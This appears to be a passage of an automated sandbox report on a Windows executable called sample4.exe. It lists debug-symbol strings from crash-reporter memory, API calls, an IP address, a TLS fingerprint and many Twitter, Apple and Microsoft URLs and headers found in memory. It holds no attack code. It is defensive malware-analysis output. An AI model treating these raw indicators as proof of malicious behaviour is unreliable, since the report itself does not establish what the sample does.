          Source: Binary string: Windows.Storage.pdb# source: WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp
          Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb@ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.368794303.0000000003011000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385888353.0000000002BCD000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbv source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdbR source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdbr source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb: source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb^ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbX source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbF source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdbj source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdb< source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb0 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb9 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00125BE6 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_00125BE6
          Source: Joe Sandbox ViewIP Address: 104.244.42.131 104.244.42.131
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: <a class="ac-gf-directory-column-section-link analytics-exitlink" data-analytics-event="link.click" data-analytics-link-component_type="Simple List" data-analytics-link-component_name="Apple Support Videos" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow">Apple Support Videos</a></li> equals www.youtube.com (Youtube)
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: <a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit @AppleSupport on Twitter" data-analytics-link-url="https://twitter.com/AppleSupport" href="https://twitter.com/AppleSupport"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-twitter.png" alt="Visit @AppleSupport on Twitter" width="32" class="as-social-channel-img" height="32"></a><a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit Apple Support on YouTube" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-youtube.png" alt="Visit Apple Support on YouTube" width="32" class="as-social-channel-img" height="32"></a></div> equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: <a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit @AppleSupport on Twitter" data-analytics-link-url="https://twitter.com/AppleSupport" href="https://twitter.com/AppleSupport"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-twitter.png" alt="Visit @AppleSupport on Twitter" width="32" class="as-social-channel-img" height="32"></a><a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit Apple Support on YouTube" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-youtube.png" alt="Visit Apple Support on YouTube" width="32" class="as-social-channel-img" height="32"></a></div> equals www.youtube.com (Youtube)
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: "https://www.youtube.com/applesupport", equals www.youtube.com (Youtube)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: ccontent-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigita equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-66a7b38d8dab6de95efafad032bbc48'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: x-response-time106x-frame-optionsSAMEORIGINx-connection-hash395ee1170928cc07d57c2eb030caea0fstrict-transport-securitymax-age=631138519content-security-policydefault-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://*.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://*.twitter.com; img-src 'self' https://*.twimg.com https://*.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://*.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://*.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self'Persistent-AuthWWW-AuthenticateCookie,X-Twitter-Internal,X-Twitter-IP-TagsVarycms-csp-nonce=4f455c5f4ddc2e0bfe34643ab6a64d2; Max-Age=15; Expires=Thu, 14 Jan 2021 03:05:33 GMT; Path=/; Securect0=7258d2ba7a6c2d02c3400c3a2bdda373; Max-Age=21600; Expires=Thu, 14 Jan 2021 09:05:18 GMT; Path=/; Domain=.twitter.com; Secureguest_id=v1%3A161059351865331646; Max-Age=63072000; Expires=Sat, 14 Jan 2023 03:05:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=Nonepersonalization_id="v1_SvL+XoOy6IEEqs+XhRe5GQ=="; Max-Age=63072000; Expires=Sat, 14 Jan 2023 03:05:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=NoneSet-Cookietsa_oServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocation"2ad86-5b8cc985f752d"ETagAuthentication-Info29766AgebytesAccept-RangesWed, 13 Jan 2021 18:49:12 GMTLast-ModifiedThu, 14 Jan 2021 03:15:18 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingapplication/javascriptContent-Type175494Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 14 Jan 2021 03:05:18 GMTDateProxy-ConnectionConnectionmax-age=600Cache-Controlp equals www.twitter.com (Twitter)
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: http://certs.apple.com/apevsrsa2g1.der06
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: http://crl.apple.com/apevsrsa2g1.crl0
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
          Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.apple.com/ocsp03-apevsrsa2g1010
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: http://ogp.me/ns#
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: http://schema.org
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/Organization
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/VideoObject
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: http://www.apple.com/support/products/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://about.twitter.com/en_us/company.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://about.twitter.com/en_us/company/brand-resources.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://about.twitter.com/en_us/company/twitter-for-good.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://about.twitter.com/en_us/safety.html
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://abs.twimg.com/favicons/favicon.ico
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://apps.apple.com/app/apple-store/id1130498044?pt=2003&amp;ct=support.footer&amp;mt=8
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://apps.apple.com/app/apple-store/id1130498044?pt=2003&ct=support.footer&mt=8
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.3.1.js
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://blog.twitter.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://blog.twitter.com/developer/
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://blog.twitter.com/en_us/topics/company/2020/allyship-right-now-black-lives-matter.html
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://blog.twitter.com/en_us/topics/company/2020/covid-19.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://blog.twitter.com/engineering/en_us.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://business.twitter.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://business.twitter.com/en/advertising.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://business.twitter.com/en/help.html
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://business.twitter.com/en/resources.html
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://c3web.trafficmanager.net/topic/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://cards-dev.twitter.com/validator
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://careers.twitter.com/
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://cdn.cms-twdigita
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://cdn.cms-twdigitalassets.com
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.png
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://cdn.goglobalwithtwitter.com
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://cdn.goglobalwithtwitter.com;
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://channel9.msdn.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://data.twitter.com/
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://developer.twitter.com/en
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://developer.twitter.com/en/community
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://developer.twitter.com/en/docs
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://developer.twitter.com/en/more/developer-terms
          Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmpString found in binary or memory: https://discussions.apple.com
          Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmpString found in binary or memory: https://eus-streaming-video-rt-microsoft-com.akamaized.net/51e203bd-a709-4164-8298-4679bd089499/7681
          Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmpString found in binary or memory: https://feedback.digital-cloud-prem.medallia.com;
          Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmpString found in binary or memory: https://getsupport.apple.com/?caller=home&PRKEYS=
          Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmpString found in binary or memory: https://getsupport.apple.com/?caller=home&amp;PRKEYS=
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ar
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/bg
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/bn
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/ca
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/contact-us
          Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/content/dam/help-twitter/brand/logo.png
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/cs
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/da
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/de
          Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/el
          Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmpString found in binary or memory: https://help.twitter.com/en
